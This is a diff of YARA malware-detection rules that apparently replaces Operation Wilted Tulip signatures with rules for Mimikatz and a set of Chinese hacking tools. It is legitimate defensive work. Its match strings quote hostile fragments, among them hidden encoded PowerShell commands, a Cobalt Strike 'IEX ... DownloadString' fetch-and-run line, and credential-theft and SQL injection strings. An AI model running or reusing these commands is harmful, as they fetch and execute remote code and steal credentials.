-		date = "2017-07-23"
+		id = "e7c1c512-e944-5d87-ac57-cdc9ab7cf660"
+		date = "2020-08-09"
 		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L47-L60"
+		reference = "https://twitter.com/sbousseaden/status/1292143504131600384?s=12"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L178-L190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "57d28f7b79cc14b8bbc2d7c9b2c16ab0f94a4b160cf7cb1d4641fe1c77e06811"
+		logic_hash = "0cc9a4d3b63e07a695df342bd2c96a55570502d6fd0ab9a1b61d63e28e1c3e05"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e5ee1f45cbfdb54b02180e158c3c1f080d89bce6a7d1fe99dd0ff09d47a36787"
 
 	strings:
-		$x1 = "powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+" ascii
+		$x1 = { 60 ba 4f ca c7 44 24 34 dc 46 6c 7a c7 44 24 38
+              03 3c 17 81 c7 44 24 3c 94 c0 3d f6 }
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Wiltedtulip_Vminst : FILE
+rule SIGNATURE_BASE_HKTL_Mimikatz_Memssp_Hookfn
 {
 	meta:
-		description = "Detects malware used in Operation Wilted Tulip"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5d21e515-eb7b-56ab-acc2-f09065769b2d"
-		date = "2017-07-23"
+		description = "Detects Default Mimikatz memssp module in-memory"
+		author = "SBousseaden"
+		id = "89940110-8a5e-5a28-bf64-3b568f8ef1f8"
+		date = "2020-08-26"
 		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L62-L88"
+		reference = "https://github.com/sbousseaden/YaraHunts/blob/master/mimikatz_memssp_hookfn.yara"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L192-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a4559c2f4de60537827d167453751a92c0030ae6ce095a2d64df777e93d4b87a"
-		score = 75
+		logic_hash = "27cf87f801111f17af76ab4c4f8329b73165f24f755d33edbb22d845bba6d3ff"
+		score = 70
+		quality = 85
+		tags = ""
+
+	strings:
+		$xc1 = { 48 81 EC A8 00 00 00 C7 84 24 88 00 00 00 ?? ??
+               ?? ?? C7 84 24 8C 00 00 00 ?? ?? ?? ?? C7 84 24
+               90 00 00 00 ?? ?? ?? 00 C7 84 24 80 00 00 00 61
+               00 00 00 C7 44 24 40 5B 00 25 00 C7 44 24 44 30
+               00 38 00 C7 44 24 48 78 00 3A 00 C7 44 24 4C 25
+               00 30 00 C7 44 24 50 38 00 78 00 C7 44 24 54 5D
+               00 20 00 C7 44 24 58 25 00 77 00 C7 44 24 5C 5A
+               00 5C 00 C7 44 24 60 25 00 77 00 C7 44 24 64 5A
+               00 09 00 C7 44 24 68 25 00 77 00 C7 44 24 6C 5A
+               00 0A 00 C7 44 24 70 00 00 00 00 48 8D 94 24 80
+               00 00 00 48 8D 8C 24 88 00 00 00 48 B8 A0 7D ??
+               ?? ?? ?? 00 00 FF D0 }
+
+	condition:
+		$xc1
+}
+rule SIGNATURE_BASE_HKTL_Mimikatz_Icon : FILE
+{
+	meta:
+		description = "Detects mimikatz icon in PE file"
+		author = "Arnim Rupp"
+		id = "2a5ea476-a30d-5eac-b57a-3fb49386c046"
+		date = "2023-02-18"
+		modified = "2023-12-05"
+		reference = "https://blog.gentilkiwi.com/mimikatz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikatz.yar#L218-L238"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "a07d477d1645e6df4f0706e44df11ea006c89e4d3218ed18a8a97b60853ff4ff"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "930118fdf1e6fbffff579e65e1810c8d91d4067cbbce798c5401cf05d7b4c911"
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
+		hash1 = "61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1"
+		hash2 = "1c3f584164ef595a37837701739a11e17e46f9982fdcee020cf5e23bad1a0925"
+		hash3 = "c6bb98b24206228a54493274ff9757ce7e0cbb4ab2968af978811cc4a98fde85"
+		hash4 = "721d3476cdc655305902d682651fffbe72e54a97cd7e91f44d1a47606bae47ab"
+		hash5 = "c0f3523151fa307248b2c64bdaac5f167b19be6fccff9eba92ac363f6d5d2595"
 
 	strings:
-		$x1 = "\\C++\\Trojan\\Target\\" ascii
-		$s1 = "%s\\system32\\rundll32.exe" fullword wide
-		$s2 = "$C:\\Windows\\temp\\l.tmp" fullword wide
-		$s3 = "%s\\svchost.exe" fullword wide
-		$s4 = "args[10] is %S and command is %S" fullword ascii
-		$s5 = "LOGON USER FAILD " fullword ascii
-		$s6 = "vminst.tmp" fullword wide
-		$s7 = "operator co_await" fullword ascii
-		$s8 = "?ReflectiveLoader@@YGKPAX@Z" fullword ascii
-		$s9 = "%s -k %s" fullword wide
-		$s10 = "ERROR in %S/%d" fullword ascii
+		$ico = {79 e1 d7 ff 7e e5 db ff 7f e8 dc ff 85 eb dd ff ba ff f1 ff 66 a0 b6 ff 01 38 61 ff 22 50 75 c3}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and $ico and filesize < 10MB
 }
-rule SIGNATURE_BASE_Wiltedtulip_Windows_UM_Task
+rule SIGNATURE_BASE_Mswin_Check_Lm_Group : FILE
 {
 	meta:
-		description = "Detects a Windows scheduled task as used in Operation Wilted Tulip"
+		description = "Chinese Hacktool Set - file mswin_check_lm_group.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d827584e-8298-56e4-8466-90950d1f286e"
-		date = "2017-07-23"
+		id = "be17981a-7cbf-55ac-bc81-9330472fc814"
+		date = "2015-06-13"
+		modified = "2021-03-15"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L9-L28"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "115d87d7e7a3d08802a9e5fd6cd08e2ec633c367"
+		logic_hash = "74be6bd9c6e01cc4ec7785b6950c8cf6acf549c06990a9d1734f4a3487a04ba7"
+		score = 70
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$s1 = "Valid_Global_Groups: checking group membership of '%s\\%s'." fullword ascii
+		$s2 = "Usage: %s [-D domain][-G][-P][-c][-d][-h]" fullword ascii
+		$s3 = "-D    default user Domain" fullword ascii
+		$fp1 = "Panda Security S.L." ascii wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 380KB and all of ( $s* ) and not 1 of ( $fp* )
+}
+rule SIGNATURE_BASE_WAF_Bypass : FILE
+{
+	meta:
+		description = "Chinese Hacktool Set - file WAF-Bypass.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d9f40934-873b-5e73-9198-987966027edc"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L90-L107"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L30-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cfc2d231b6be798172e5d7ffc525842c7eed6d78a145c401136452c46f21e3b2"
+		hash = "860a9d7aac2ce3a40ac54a4a0bd442c6b945fa4e"
+		logic_hash = "e66d51b465e5d919555084d299a22f07a949a0a9adf4a3f246f6b5222d39b91a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4c2fc21a4aab7686877ddd35d74a917f6156e48117920d45a3d2f21fb74fedd3"
 
 	strings:
-		$r1 = "<Command>C:\\Windows\\syswow64\\rundll32.exe</Command>" fullword wide
-		$p1 = "<Arguments>\"C:\\Users\\public\\" wide
-		$c1 = "svchost64.swp\",checkUpdate" wide ascii
-		$c2 = "svchost64.swp,checkUpdate" wide ascii
+		$s1 = "Email: blacksplitn@gmail.com" fullword wide
+		$s2 = "User-Agent:" fullword wide
+		$s3 = "Send Failed.in RemoteThread" fullword ascii
+		$s4 = "www.example.com" fullword wide
+		$s5 = "Get Domain:%s IP Failed." fullword ascii
+		$s6 = "Connect To Server Failed." fullword ascii
 
 	condition:
-		($r1 and $p1 ) or 1 of ( $c* )
+		uint16( 0 ) == 0x5a4d and filesize < 7992KB and 5 of them
 }
-rule SIGNATURE_BASE_Wiltedtulip_Windowstask
+rule SIGNATURE_BASE_Guilin_Veterans_Cookie_Spoofing_Tool : FILE
 {
 	meta:
-		description = "Detects hack tool used in Operation Wilted Tulip - Windows Tasks"
+		description = "Chinese Hacktool Set - file Guilin veterans cookie spoofing tool.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ad8193f0-e664-50a8-ab05-38027a2e33cd"
-		date = "2017-07-23"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L109-L128"
+		id = "13f78e0b-c975-5879-9af1-8c619d6c94a9"
+		date = "2015-06-13"
+		modified = "2023-01-27"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L50-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a2bbcb02f34b2da3d88772d211cc7bfb669384161eec94336cdc2474144b16ae"
+		hash = "06b1969bc35b2ee8d66f7ce8a2120d3016a00bb1"
+		logic_hash = "5fd136f44ebce28db4f77f2f8730eb67fc4c2d58921b73378b8d87e1444a4b67"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c"
-		hash2 = "340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d"
-		hash3 = "b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01"
-		hash4 = "5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a"
-		hash5 = "984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34"
 
 	strings:
-		$x1 = "<Command>C:\\Windows\\svchost.exe</Command>" fullword wide
-		$x2 = "<Arguments>-nop -w hidden -encodedcommand" wide
-		$x3 = "-encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA"
+		$s0 = "kernel32.dll^G" fullword ascii
+		$s1 = "\\.Sus\"B" ascii
+		$s4 = "u56Load3" fullword ascii
+		$s11 = "O MYTMP(iM) VALUES (" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1387KB and all of them
 }
-rule SIGNATURE_BASE_Wiltedtulip_Tdtess : FILE
+rule SIGNATURE_BASE_Marathontool : FILE
 {
 	meta:
-		description = "Detects malicious service used in Operation Wilted Tulip"
+		description = "Chinese Hacktool Set - file MarathonTool.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0ecb391b-a4f9-5362-bb65-73801ae497de"
-		date = "2017-07-23"
+		id = "23513361-ecac-5ddb-92b9-4dd8da12e8db"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L130-L147"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L69-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ffd10e06b3a8f3054747443b863070e8726589fc795f816832dbf73c0c34e080"
+		hash = "084a27cd3404554cc799d0e689f65880e10b59e3"
+		logic_hash = "2d52d640ef44d933791d1da0d1263dba15702180c730500e04d364dd6b4d6081"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3fd28b9d1f26bd0cee16a167184c9f4a22fd829454fd89349f2962548f70dc34"
 
 	strings:
-		$x1 = "d2lubG9naW4k" fullword wide
-		$x2 = "C:\\Users\\admin\\Documents\\visual studio 2015\\Projects\\Export\\TDTESS_ShortOne\\WinService Template\\" ascii
-		$s1 = "\\WinService Template\\obj\\x64\\x64\\winlogin" ascii
-		$s2 = "winlogin.exe" fullword wide
+		$s0 = "MarathonTool" ascii
+		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
+		$s18 = "SELECT UNICODE(SUBSTRING((system_user),{0},1))" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of them ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1040KB and all of them
 }
-rule SIGNATURE_BASE_Wiltedtulip_Silverlightmsi : FILE
+rule SIGNATURE_BASE_PLUGIN_Trackid : FILE
 {
 	meta:
-		description = "Detects powershell tool call Get_AD_Users_Logon_History used in Operation Wilted Tulip"
+		description = "Chinese Hacktool Set - file TracKid.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6430d464-b9c7-5f19-b89d-3c70f99af688"
-		date = "2017-07-23"
+		id = "8dd77df1-748e-5778-be40-38b794c74b97"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L149-L165"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L86-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "716db8f8e7d71c7f3deaeb9ac8e141c9bf374e5dae992e8e2623070c81089953"
+		hash = "a114181b334e850d4b33e9be2794f5bb0eb59a09"
+		logic_hash = "a62112dbf2ef696e4eb7f6787a0e0930c29d9834f46c87493954498fa4b375f6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c75906dbc3078ff81092f6a799c31afc79b1dece29db696b2ecf27951a86a1b2"
 
 	strings:
-		$x1 = ".\\Get_AD_Users_Logon_History.ps1 -MaxEvent" fullword ascii
-		$x2 = "if ((Resolve-dnsname $_.\"IP Address\" -Type PTR -TcpOnly -DnsOnly -ErrorAction \"SilentlyContinue\").Type -eq \"PTR\")" fullword ascii
-		$x3 = "$Client_Name = (Resolve-dnsname $_.\"IP Address\" -Type PTR -TcpOnly -DnsOnly).NameHost  " fullword ascii
-		$x4 = "########## Find the Computer account in AD and if not found, throw an exception ###########" fullword ascii
+		$s0 = "E-mail: cracker_prince@163.com" fullword ascii
+		$s1 = ".\\TracKid Log\\%s.txt" fullword ascii
+		$s2 = "Coded by prince" fullword ascii
+		$s3 = "TracKid.dll" fullword ascii
+		$s4 = ".\\TracKid Log" fullword ascii
+		$s5 = "%08x -- %s" fullword ascii
 
 	condition:
-		( filesize < 20KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
 }
-
-rule SIGNATURE_BASE_Wiltedtulip_Matryoshka_Injector : FILE
+rule SIGNATURE_BASE_Pc_Pc2015 : FILE
 {
 	meta:
-		description = "Detects hack tool used in Operation Wilted Tulip"
+		description = "Chinese Hacktool Set - file pc2015.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e4cf2a31-33c8-5db1-84ca-f63b65a0a0a3"
-		date = "2017-07-23"
+		id = "aa7c0b5e-91c3-52cc-9e06-b4648d0b8825"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L167-L189"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L106-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e02d26882c85b77bd97629fce20bd027e1f5f7e28ae0c43c9ea7a4b1e5d02cd1"
+		hash = "de4f098611ac9eece91b079050b2d0b23afe0bcb"
+		logic_hash = "34d66d8b9e637c067ec2d9387b7b57458312d75892e33b95eb1095200799cf3b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c41e97b3b22a3f0264f10af2e71e3db44e53c6633d0d690ac4d2f8f5005708ed"
-		hash2 = "b93b5d6716a4f8eee450d9f374d0294d1800784bc99c6934246570e4baffe509"
 
 	strings:
-		$s1 = "Injector.dll" fullword ascii
-		$s2 = "ReflectiveLoader" fullword ascii
+		$s0 = "\\svchost.exe" ascii
+		$s1 = "LON\\OD\\O-\\O)\\O%\\O!\\O=\\O9\\O5\\O1\\O" fullword ascii
+		$s8 = "%s%08x.001" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them ) or ( pe.exports ( "__dec" ) and pe.exports ( "_check" ) and pe.exports ( "_dec" ) and pe.exports ( "start" ) and pe.exports ( "test" ) )
+		uint16( 0 ) == 0x5a4d and filesize < 309KB and all of them
 }
-rule SIGNATURE_BASE_Wiltedtulip_Zpp : FILE
+rule SIGNATURE_BASE_Sekurlsa : FILE
 {
 	meta:
-		description = "Detects hack tool used in Operation Wilted Tulip"
+		description = "Chinese Hacktool Set - file sekurlsa.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7d833cb2-485e-5a26-be2f-aaebde7fdef2"
-		date = "2017-07-23"
-		modified = "2022-12-21"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L191-L215"
+		id = "b65dc578-e5a1-57e6-bd98-2c45cd07e857"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L123-L139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "32c91f8a02443a6f024acb3f941b7f11472e7f1517c54a3c7edc89ce88ba73e0"
+		hash = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
+		logic_hash = "dea05c7f19a834cc936c452ca2f6f4286e6c3dae002747c27913960199451c3f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "10ec585dc1304436821a11e35473c0710e844ba18727b302c6bd7f8ebac574bb"
-		hash2 = "7d046a3ed15035ea197235980a72d133863c372cc27545af652e1b2389c23918"
-		hash3 = "6d6816e0b9c24e904bc7c5fea5951d53465c478cc159ab900d975baf8a0921cf"
 
 	strings:
-		$x1 = "[ERROR] Error Main -i -s -d -gt -lt -mb" fullword wide
-		$x2 = "[ERROR] Error Main -i(with.) -s -d -gt -lt -mb -o -e" fullword wide
-		$s1 = "LT Time invalid" fullword wide
-		$s2 = "doCompressInNetWorkDirectory" fullword ascii
-		$s3 = "files remaining ,total file save = " fullword wide
-		$s4 = "$ec996350-79a4-477b-87ae-2d5b9dbe20fd" fullword ascii
-		$s5 = "Destinition Directory Not Found" fullword wide
-		$s6 = "\\obj\\Release\\ZPP.pdb" ascii
+		$s1 = "Bienvenue dans un processus distant" fullword wide
+		$s2 = "Format d'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur" wide
+		$s3 = "SECURITY\\Policy\\Secrets" fullword wide
+		$s4 = "Injection de donn" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1150KB and all of them
 }
-rule SIGNATURE_BASE_Wiltedtulip_Netsrv_Netsrvs : FILE
+rule SIGNATURE_BASE_Mysqlfast : FILE
 {
 	meta:
-		description = "Detects sample from Operation Wilted Tulip"
+		description = "Chinese Hacktool Set - file mysqlfast.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4b58bb08-88da-535c-8ce5-e7113e5b7045"
-		date = "2017-07-23"
+		id = "93ee91cd-a6b8-5ed9-b750-779f88032be6"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L217-L242"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L141-L159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1506d1eddd43731c00e5f01a292589b07de5055bbdd7b1f7c2d7ac7a09b8ae58"
+		hash = "32b60350390fe7024af7b4b8fbf50f13306c546f"
+		logic_hash = "3ea75954831e705d0d25efa115288e66868d9b814f0990fd048bbe1209a8d933"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a062cb4364125427b54375d51e9e9afb0baeb09b05a600937f70c9d6d365f4e5"
-		hash2 = "afa563221aac89f96c383f9f9f4ef81d82c69419f124a80b7f4a8c437d83ce77"
-		hash3 = "acf24620e544f79e55fd8ae6022e040257b60b33cf474c37f2877c39fbf2308a"
-		hash4 = "bff115d5fb4fd8a395d158fb18175d1d183c8869d54624c706ee48a1180b2361"
-		hash5 = "07ab795eeb16421a50c36257e6e703188a0fef9ed87647e588d0cd2fcf56fe43"
 
 	strings:
-		$s1 = "Process %d Created" fullword ascii
-		$s2 = "%s\\system32\\rundll32.exe" fullword wide
-		$s3 = "%s\\SysWOW64\\rundll32.exe" fullword wide
-		$c1 = "slbhttps" fullword ascii
-		$c2 = "/slbhttps" fullword wide
-		$c3 = "/slbdnsk1" fullword wide
-		$c4 = "netsrv" fullword wide
-		$c5 = "/slbhttps" fullword wide
+		$s2 = "Invalid password hash: %s" fullword ascii
+		$s3 = "-= MySql Hash Cracker =- " fullword ascii
+		$s4 = "Usage: %s hash" fullword ascii
+		$s5 = "Hash: %08lx%08lx" fullword ascii
+		$s6 = "Found pass: " fullword ascii
+		$s7 = "Pass not found" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) and 1 of ( $c* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 4 of them
 }
-
-rule SIGNATURE_BASE_Wiltedtulip_Reflectiveloader : FILE
+rule SIGNATURE_BASE_Dtools2_02_Dtools : FILE
 {
 	meta:
-		description = "Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip"
+		description = "Chinese Hacktool Set - file DTools.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0c7dfb44-8acb-5f36-9683-745560f1f795"
-		date = "2017-07-23"
+		id = "fc812797-12d8-596a-8ebe-dd8b0d7a4b7e"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L244-L268"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L161-L179"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9488d2e97d0ea031a138e72964a3b56781f9d05c1676ff0b360407db944e26de"
+		hash = "9f99771427120d09ec7afa3b21a1cb9ed720af12"
+		logic_hash = "51e30d39f388546ac233b4b97a38f225c90d2f006bc509dd7eecfb408aef9be5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904"
-		hash2 = "1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a"
-		hash3 = "a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f"
-		hash4 = "cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0"
-		hash5 = "eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89"
 
 	strings:
-		$x1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
-		$x2 = "%d is an x86 process (can't inject x64 content)" fullword ascii
-		$x3 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
-		$x4 = "Failed to impersonate token from %d (%u)" fullword ascii
-		$x5 = "Failed to impersonate logged on user %d (%u)" fullword ascii
-		$x6 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
+		$s0 = "kernel32.dll" ascii
+		$s1 = "TSETPASSWORDFORM" fullword wide
+		$s2 = "TGETNTUSERNAMEFORM" fullword wide
+		$s3 = "TPORTFORM" fullword wide
+		$s4 = "ShellFold" fullword ascii
+		$s5 = "DefaultPHotLigh" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them ) or ( 2 of them ) or pe.exports ( "_ReflectiveLoader@4" )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_Wiltedtulip_Matryoshka_RAT : FILE
+rule SIGNATURE_BASE_Dll_Packetx : FILE
 {
 	meta:
-		description = "Detects Matryoshka RAT used in Operation Wilted Tulip"
+		description = "Chinese Hacktool Set - file PacketX.dll - ActiveX wrapper for WinPcap packet capture library"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e851e212-bb71-55c9-9bc1-0041bb04bef5"
-		date = "2017-07-23"
+		id = "19ab5977-934d-5e3f-8bba-925bb57bf486"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/tulip"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wilted_tulip.yar#L270-L289"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L181-L196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9e878d9e3dc3f2050e52a046038f4f855b5b777948d928e0bc6d7a98fc0a7119"
-		score = 75
+		hash = "3f0908e0a38512d2a4fb05a824aa0f6cf3ba3b71"
+		logic_hash = "161d174376c599b1b794fa1174349ae12b198842d89769baec4b9664729a3983"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
